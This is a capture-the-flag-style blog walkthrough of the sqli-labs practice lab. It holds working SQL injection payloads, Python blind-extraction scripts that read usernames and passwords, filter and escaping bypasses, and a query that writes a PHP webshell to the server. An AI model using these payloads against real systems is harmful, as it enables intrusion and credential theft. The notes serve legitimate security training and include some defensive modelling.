Sqli-labs walkthrough notes

Less-1

  • String-type injection: the id is wrapped in single quotes

  • A bare ' triggers a MySQL syntax error

  • ?id=-1' order by 4%23 errors, so the query returns 3 columns (%23 is the URL-encoded #, which comments out the trailing LIMIT 0,1)

  • ?id=-1' union select 1,database(),3 %23

  • ?id=-1%27 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'%23

  • ?id=-1%27 union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'%23

  • ?id=-1%27 union select 1,group_concat(username,0x3a,password),3 from users %23 (0x3a is ':', used as the separator)

Less-2

  • Numeric injection: the id is not quoted

  • A bare ' triggers an error

  • ?id=0 order by 4 errors, so again 3 columns

  • Same steps as Less-1, without the closing quote…

Less-3

  • Error message for ': You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'') LIMIT 0,1' at line 1
  • Inferred SQL statement: select * from users where id=('$id') LIMIT 0,1;
  • ?id=-1%27) order by 4%23
  • Same steps as Less-1, closing with ')

Less-4

  • ' gives no error; " gives: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-1"") LIMIT 0,1' at line 1
  • Inferred SQL statement: select * from users where id = ("$id") LIMIT 0,1;
  • ?id=-1") order by 4%23
  • Same steps as Less-1, closing with ")

Less-5

Error-based or blind injection

  • ' produces a MySQL error; a valid query only prints "You are in..." and never echoes the row, so the page is a yes/no oracle: boolean-based blind injection (error-based extraction with updatexml(), as in Less-13, also works here)

  • ?id=1%27 and length(database())>8%23 determine the database name length (security is 8 characters, so >8 is false and >7 is true)

  • ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100%23 read one character at a time by comparing its ASCII value (this query tests the first table name; for the database name itself use database(), as the script below does)

  • Python script:

    import requests

    database = ''
    # Each request asks "is character {times} of database() greater than {num}?";
    # Less-5 prints "You are in..." only when the condition holds.
    url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and ascii(substr((select database()),{times},1)) > {num}%23'
    for times in range(1, 9):                        # the name is 8 characters long (tested above)
        for num in range(ord('a'), ord('z') + 1):    # candidates are tried in ascending order
            content = requests.get(url.format(times=times, num=num)).text
            if 'You' not in content:                 # ascii(char) <= num, i.e. char == num
                database += chr(num)
                print(database)
                break
        # a character outside a-z never matches and that position is silently skipped
    print(database)
  • ?id=1%27 and (select length(group_concat(table_name)) from information_schema.tables where table_schema=%27security%27)>28 %23 determine the combined length of all table names

  • ?id=1%27 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=%27security%27),1,1))>100 %23 read the table names one character at a time

  • Python script:

    import requests

    tables = ''
    url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and%20ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),{times},1))%3E{num}%23'
    # candidates: the ',' separator that group_concat() inserts, then a-z
    nums = [ord(',')] + list(range(ord('a'), ord('z') + 1))
    for times in range(1, 30):                       # combined length is 29 (emails,referers,uagents,users)
        for num in nums:
            content = requests.get(url.format(times=times, num=num)).text
            if 'You' not in content:                 # ascii(char) <= num, i.e. char == num
                tables += chr(num)
                print(tables)
                break
        # a character outside this set is mis-read as the first candidate above it
    print(tables)
  • ?id=1%27 and (select length(group_concat(column_name)) from information_schema.columns where table_name=%27users%27)> 20%23 determine the combined length of the column names

  • ?id=1%27 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=%27users%27),1,1))>20 %23 read the column names one character at a time (adding table_schema='security', as the script below does, avoids picking up a users table from another schema)

  • Python script:

    import requests

    columns = ''
    url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27 and table_schema=%27security%27),{times},1))%3E{num} %23'
    # candidates: the ',' separator, then a-z
    nums = [ord(',')] + list(range(ord('a'), ord('z') + 1))
    # use the length measured above: id,username,password = 20 characters; a position
    # past the end reads as '' (ascii 0) and would be recorded as ','
    for times in range(1, 21):
        for num in nums:
            content = requests.get(url.format(times=times, num=num)).text
            if 'You' not in content:                 # ascii(char) <= num, i.e. char == num
                columns += chr(num)
                print(columns)
                break
    print(columns)
  • ?id=1%27 and (select length(group_concat(username,password)) from users)> 100%23 determine the length of the data

  • ?id=1%27 and ascii(substr((select group_concat(username,0x3a,password) from users),1,1))> 67%23 read the rows one character at a time

  • Python script:

    import requests

    rows = ''
    url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and%20ascii(substr((select%20group_concat(concat_ws(":",username,password))%20from%20users),{times},1))%3E{num} %23'
    # Candidates must cover every byte that can appear: the ':' and ',' separators,
    # digits and punctuation in the lab passwords (I-kill-you, p@ssword, mob!le) as
    # well as letters, so test all printable ASCII. 0 is tried first to detect the
    # end of the string: substr() past the end gives '' and ascii('') is 0.
    nums = [0] + list(range(32, 127))
    done = False
    for times in range(1, 300):                      # upper bound; the loop stops at the end of the data
        for num in nums:
            content = requests.get(url.format(times=times, num=num)).text
            if 'You' not in content:                 # ascii(char) <= num, i.e. char == num
                if num == 0:
                    done = True
                else:
                    rows += chr(num)
                    print(rows)
                break
        if done:
            break
    print(rows)

Less-6

  • ?id=1%22%23 same as Less-5 with ' replaced by "

Less-7

  • /Less-2/?id=0 union select 1,@@datadir,@@basedir%23 (run in Less-2, which echoes the columns; Less-7 prints nothing) gives MySQL's absolute data and base directories, from which the web root is worked out
  • ?id=1')) UNION SELECT 1,2,'<?php @eval($_POST["1"]);?>' into outfile "c:\\phpstudy\\www\\sql\\Less-7\\1.php"%23 writes a one-line webshell (PHP superglobals are case-sensitive, so it must be $_POST); this needs the FILE privilege and a secure_file_priv setting that permits the target directory

Less-8

  • Same as Less-5: boolean-based blind injection (the page shows "You are in..." or nothing, with no error text)

Less-9

  • 1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))# time-based blind injection: the page looks the same either way, so the delay is the signal
  • Python script:

    import requests
    import time

    # When the condition is false MySQL sleeps 3 s, so a slow response means
    # ascii(char) <= asc; candidates are tried in ascending order.
    url = "http://192.168.35.128/sql/Less-9/?id=1' and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
    db_name = ''
    for num in range(1, 9):                          # database name is 8 characters
        for asc in range(ord('a'), ord('z') + 1):
            s_time = time.time()
            requests.get(url.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:                # the sleep ran: this is the character
                db_name += chr(asc)
                print(db_name)
                break
    print(db_name)
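
The scripts for Less-5 and Less-9 above probe one candidate per request and only recognise the characters they were told to expect. The following is an added example, not from the original notes, of the same boolean/time-based extraction done by binary search over ascii(substr(...)): at most seven requests per character, every printable byte covered, and the end of the string detected from ascii('') = 0. The host, paths and the "You are in..." marker are taken from the notes; the HTTP oracles use urllib instead of requests, and the simulated oracle is a constructed stand-in so the extractor can be run offline.

```python
"""Blind SQL injection extraction by binary search (boolean or time-based)."""
import time
import urllib.parse
import urllib.request
from typing import Callable

# An oracle answers one yes/no question: is the pos-th character of the
# secret expression strictly greater than ASCII value n?
Oracle = Callable[[int, int], bool]


def extract_string(oracle: Oracle, max_len: int = 64) -> str:
    """Recover a string one character at a time, halving the range each request."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                 # the character's code lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):        # char > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                     # substr() past the end is '', ascii('') = 0
            break
        result += chr(lo)
    return result


def simulated_oracle(secret: str) -> Oracle:
    """Offline stand-in for the database (constructed, not a real query)."""
    def ask(pos: int, n: int) -> bool:
        ch = secret[pos - 1] if pos <= len(secret) else ""
        return (ord(ch) if ch else 0) > n
    return ask


def boolean_oracle(base: str, expression: str, marker: str = "You are in") -> Oracle:
    """Less-5/6/8 style: the page contains `marker` only when the condition holds.

    `expression` is the SQL to read, e.g. "database()" or
    "(select group_concat(table_name) from information_schema.tables
      where table_schema=database())".  Host/path are assumed from the notes.
    """
    def ask(pos: int, n: int) -> bool:
        payload = f"1' and ascii(substr({expression},{pos},1))>{n}#"
        url = base + "?id=" + urllib.parse.quote(payload, safe="")
        with urllib.request.urlopen(url, timeout=10) as resp:
            return marker in resp.read().decode("utf-8", "replace")
    return ask


def time_oracle(base: str, expression: str, delay: int = 3) -> Oracle:
    """Less-9/10 style: no visible difference, so the false branch sleeps."""
    def ask(pos: int, n: int) -> bool:
        payload = f"1' and if(ascii(substr({expression},{pos},1))>{n},0,sleep({delay}))#"
        url = base + "?id=" + urllib.parse.quote(payload, safe="")
        start = time.monotonic()
        with urllib.request.urlopen(url, timeout=delay * 5) as resp:
            resp.read()
        # a response that took about `delay` seconds means the condition was false
        return (time.monotonic() - start) < delay
    return ask


if __name__ == "__main__":
    # Offline demo with a constructed secret (the lab's database name).
    print(extract_string(simulated_oracle("security")))
    # Against the lab (assumed host from the notes; uncomment to run):
    # print(extract_string(boolean_oracle("http://192.168.35.128/sql/Less-5/", "database()")))
    # print(extract_string(time_oracle("http://192.168.35.128/sql/Less-9/", "database()")))
```

Because a comparison returns the same answer regardless of the page's character set, the same extractor reads table names, column names and the group_concat() of username:password rows by changing only the expression, and the time-based variant differs from the boolean one in nothing but the oracle.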

Less-10

  • 1" and if(ascii(substr(database(),1,1))>115,1,sleep(5))#
  • Same as Less-9 with ' replaced by "

Less-11

  • POST login form: uname=1%27 order by 3#&passwd=1 errors, so the query returns 2 columns
  • uname=1%27 union select 1,database()#&passwd=1

Less-12

  • uname=1%22) union select 1,database()#&passwd=1 (closing is ")
  • Same as Less-11

Less-13

  • uname=1%27&passwd=1 error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1, so the closing is ')
  • The login prints no data, so use error-based injection with updatexml(), which leaks the value inside the XPath error message (at most 32 characters per query; use substr() on the inner select for longer values)
  • uname=1%27) and updatexml(1,concat(0x7e,(select database()),0x7e),1)# &passwd=1
  • uname=1%27) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= 'security'),0x7e),1)# &passwd=1

Less-14

  • ' gives no error, " does: the closing is "
  • Same as Less-13

Less-15

  • uname=admin' and if(ascii(substr(database(),1,1))=115,sleep(2),1)#&passwd=1 time-based blind injection (no error text and no output, so the delay is the only signal)

Less-16

  • Closing is ")
  • Same as Less-15

Less-17

  • Injection is in the passwd field (the password-update query)
  • Use error-based (updatexml) or blind injection

Less-18

  • Source: $insert="INSERT INTO security.uagents(uagent,ip_address,username) VALUES ('$uagent', '$IP', $uname)";
  • Inject via the User-Agent header (the insert only runs after a successful login, so a valid username/password is needed)
  • ' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

Less-19

  • Same as Less-18, injecting via the Referer header

Less-20

  • Same as Less-18, injecting via the Cookie header

Less-21

  • The cookie value is base64-encoded and closed with '): base64-encode ') union select 1,database(),6 or 1=1 # and send it as the cookie value

Less-22

  • Same as Less-21 with ' replaced by ", base64-encoded

Less-23

  • # and -- are stripped, so instead of a comment close the query with and '1'='1
  • payload 0' union select 1,database(),3 and '1'='1

Less-24

  • Second-order injection
  • payload: register a user named admin'# and then change its password; the stored name is used unescaped in the update query, so WHERE username='admin'#' ... matches the real admin row and admin's password is changed

Less-25

  • payload ?id=0' union select 1,database(),3# (this lesson strips or/and, which a union query does not need)

Less-25a

  • payload ?id=0 union select 1,database(),3# (numeric, no closing quote)

Less-26

  • Spaces are stripped; whitespace alternatives: %20 %09 %0a %0b %0c %0d %a0 (which ones work depends on the Apache/PHP build: %a0 works on the Windows lab setup but is often rejected on Linux, where %0a/%0b are the fallbacks)
  • payload 0'%a0union%a0select%a01,database(),3%26%26%a0'1 (%26%26 is &&, since and is filtered too)

Less-26a

  • Filters or, and, /*, --, #, spaces and /; the closing is ')
  • payload 0')%a0union%a0select%a01,version(),database()%26%26%a0('1

Less-27

  • Filters union and select in a few fixed casings, so mixed case gets through
  • 0'%a0UNIoN%A0SeLecT%a01,database(),3%26%26%a0'1
  • 0'%a0UNIoN%A0SeLecT%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0'1
  • 0'%a0UNIoN%a0SeLecT%a01,group_concat(username,password),3%a0from%a0security%2Eusers%a0where%a01%26%26%a0'1 (%2E is the '.' in security.users)

Less-27a

  • payload 0"%a0UNIoN%a0SeLecT%a01,version(),database()%26%26%a0"1
  • Same as Less-27 with ' replaced by "

Less-28

  • Filters the phrase union select (the two keywords with whitespace between); %a0 between them is not treated as whitespace by the filter's regex, and (1) avoids a space after select
  • 0')%a0UNIoN%A0SeLecT(1),version(),database()%26%26%a0('1

Less-28a

  • 0') UNIon%A0SeLecT 1,version(),database()--+ (only the union select phrase is filtered here, so plain spaces and -- are fine)
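
As an added example (not the lab's own source, whose exact regex list may differ), the model below reconstructs the behaviour the notes describe for the Less-27 and Less-28a blacklists and checks which payloads survive them. It works on bytes deliberately: PHP's PCRE, like a Python bytes regex, does not count 0xa0 as \s, which is why %a0 between the keywords slips past a /union\s+select/i filter while MySQL (on the lab's Windows build) still reads it as whitespace. The payloads are constructed from the ones in the notes.

```python
"""Model of the Less-27 / Less-28a keyword blacklists and the bypasses."""
import re


def blacklist_less27(raw: bytes) -> bytes:
    """Assumed model of Less-27: strip comment tokens, spaces and a few fixed
    casings of union/select.  Mixed case such as UNIoN/SeLecT is untouched."""
    for pat in (rb"[/*]", rb"--", rb"#", rb"[ +]",
                rb"union", rb"UNION", rb"Union",
                rb"select", rb"SELECT", rb"Select"):
        raw = re.sub(pat, b"", raw)
    return raw


def blacklist_less28a(raw: bytes) -> bytes:
    """Assumed model of Less-28a: only the phrase union<whitespace>select is
    removed, case-insensitively.  \\s in a bytes pattern is ASCII whitespace
    only, so 0xa0 (%a0) between the two words is not matched."""
    return re.sub(rb"union\s+select", b"", raw, flags=re.IGNORECASE)


def hardened_union_filter(raw: bytes) -> bytes:
    """The same rule with 0xa0 added to the separator class.  It catches the
    %a0 trick but is still a blacklist and falls to the next separator MySQL
    accepts (a comment, a parenthesis); prepared statements are the real fix."""
    return re.sub(rb"union[\s\xa0]+select", b"", raw, flags=re.IGNORECASE)


def still_has_union_select(filtered: bytes) -> bool:
    """Would MySQL still see a UNION SELECT?  Normalise 0xa0 to a space (as the
    lab's MySQL does) and compare case-insensitively."""
    normalised = filtered.replace(b"\xa0", b" ").lower()
    return re.search(rb"union\s+select", normalised) is not None


if __name__ == "__main__":
    plain = b"0' union select 1,database(),3#"
    p27 = b"0'\xa0UNIoN\xa0SeLecT\xa01,database(),3&&\xa0'1"
    p28a = b"0') UNIon\xa0SeLecT 1,version(),database()--+"
    print(blacklist_less27(plain))                               # keywords stripped
    print(still_has_union_select(blacklist_less27(p27)))         # True
    print(still_has_union_select(blacklist_less28a(p28a)))       # True
    print(still_has_union_select(hardened_union_filter(p28a)))   # False
```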

Less-29

  • Exploits the fact that Tomcat and Apache handle a repeated query parameter differently: Tomcat takes the first occurrence and Apache (PHP) takes the last, so for ?id=1&id=2 Tomcat sees 1 and Apache sees 2.
  • The client's request first reaches Tomcat, which parses the first parameter; Tomcat then forwards the request to Apache, which parses the last one, and it is Apache's result that is returned. In real deployments with two layers of servers the first layer usually does the data processing and filtering, acting like a WAF. Because the two layers parse parameters differently, we can use an HPP (HTTP parameter pollution) attack, which threatens both the server and the client.
  • payload ?id=1&id=0' union select 1,group_concat(schema_name),2 from information_schema.schemata%23
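
An added example, not part of the original notes, that models the two parsers described above: a Tomcat-style "first occurrence wins" view, a PHP-style "last occurrence wins" view, a constructed toy filter that stands in for the front layer, and the check a fix would add (refuse any request that repeats a parameter name so both layers see the same value). The query string is built from the payload in the notes.

```python
"""HTTP parameter pollution between a first-wins and a last-wins parser."""
from urllib.parse import parse_qsl


def first_wins(query: str) -> dict:
    """Tomcat-style view (getParameter): the first occurrence of a name wins."""
    seen: dict = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        seen.setdefault(key, value)
    return seen


def last_wins(query: str) -> dict:
    """PHP-style view ($_GET): a later occurrence overwrites an earlier one."""
    return dict(parse_qsl(query, keep_blank_values=True))


def looks_like_injection(value: str) -> bool:
    """Constructed toy check standing in for the front layer's filtering."""
    lowered = value.lower()
    return "'" in lowered or "union" in lowered or "select" in lowered


def front_layer_allows(query: str) -> bool:
    """The front layer inspects the value it parses, i.e. the first id."""
    return not looks_like_injection(first_wins(query).get("id", ""))


def backend_receives(query: str) -> str:
    """What the PHP backend puts into the SQL: the last id."""
    return last_wins(query).get("id", "")


def has_repeated_params(query: str) -> bool:
    """Defensive check: reject any request that repeats a parameter name,
    so that no two layers can disagree about its value."""
    names = [key for key, _ in parse_qsl(query, keep_blank_values=True)]
    return len(names) != len(set(names))


if __name__ == "__main__":
    # Constructed query string using the payload from the notes.
    q = ("id=1&id=0%27%20union%20select%201,group_concat(schema_name),2"
         "%20from%20information_schema.schemata%23")
    print(front_layer_allows(q))    # True: the front layer only saw id=1
    print(backend_receives(q))      # the injected value reaches MySQL
    print(has_repeated_params(q))   # True: this is what a fix should reject
```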


Less-30

  • Same as Less-29 with ' replaced by "

Less-31

  • Same as Less-29 with ' replaced by ")

Less-32

  • Wide-byte injection: the connection uses GBK, so %df followed by the backslash (%5c) that the escaping inserts forms one valid two-byte character and the quote is no longer escaped
  • payload ?id=0%df' union select 1,group_concat(schema_name),2 from information_schema.schemata%23

Less-33

  • Uses PHP's addslashes(), which returns the string with a backslash added before the predefined characters ' " \ and NUL
  • Same as Less-32: the GBK trick swallows that backslash in exactly the same way
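
An added example, not part of the original notes, showing why the %df' trick of Less-32/33 works: addslashes() operates on bytes and inserts 0x5c before the quote, and when the result is then read as GBK the pair 0xdf 0x5c is one valid character, so the quote is live again. The byte-level addslashes() is a model of the PHP function, the query template follows the shape of the lab's id lookup, and safe_query() is an assumed hardening for illustration only (in PHP the equivalent is mysql_set_charset('gbk') with a charset-aware escaper, or a prepared statement).

```python
"""GBK wide-byte injection against addslashes()-style escaping."""
from typing import Optional


def addslashes(data: bytes) -> bytes:
    """Byte-level model of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5c):      # '  "  \
            out += b"\\"
            out.append(b)
        elif b == 0x00:
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)


def vulnerable_query(id_bytes: bytes) -> str:
    """Lab behaviour: escape the raw bytes, then let MySQL read them as GBK.
    0xdf 0x5c is one valid GBK character, so the inserted backslash is eaten."""
    literal = addslashes(id_bytes).decode("gbk")
    return f"SELECT * FROM users WHERE id='{literal}' LIMIT 0,1"


def safe_query(id_bytes: bytes) -> Optional[str]:
    """Assumed hardening: decode as GBK first and reject anything that is not
    valid GBK, then escape characters rather than bytes.  0xdf followed by
    0x27 is not a valid GBK sequence, so the payload never reaches the query."""
    try:
        text = id_bytes.decode("gbk")
    except UnicodeDecodeError:
        return None
    literal = addslashes(text.encode("utf-8")).decode("utf-8")
    return f"SELECT * FROM users WHERE id='{literal}' LIMIT 0,1"


if __name__ == "__main__":
    # Constructed input: the notes' ?id=0%df' union select ... after URL decoding.
    payload = b"0\xdf' union select 1,group_concat(schema_name),2 from information_schema.schemata#"
    print(vulnerable_query(payload))     # the quote is live: no backslash survives
    print(safe_query(payload))           # None: rejected
    print(safe_query(b"0' or 1=1#"))     # the quote stays escaped
```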

Less-34

  • 同Less-32
  • payload uname=admin%df' union select database(),2#&passwd=1 (POST form; the login query returns 2 columns)

Less-35

  • ' errors with ... use near '\' LIMIT 0,1' at line 1: the quote is escaped, but id is numeric, so no closing is needed
  • payload ?id=-1 union select 1,2,database()%23
Author: 2hangd
Link: https://zhangding222.github.io/2019/12/30/Sqli-labs通关笔记/
License: unless stated otherwise, all posts on this blog are released under CC BY-NC-SA 4.0. When reposting, credit 2hangding's bl0g.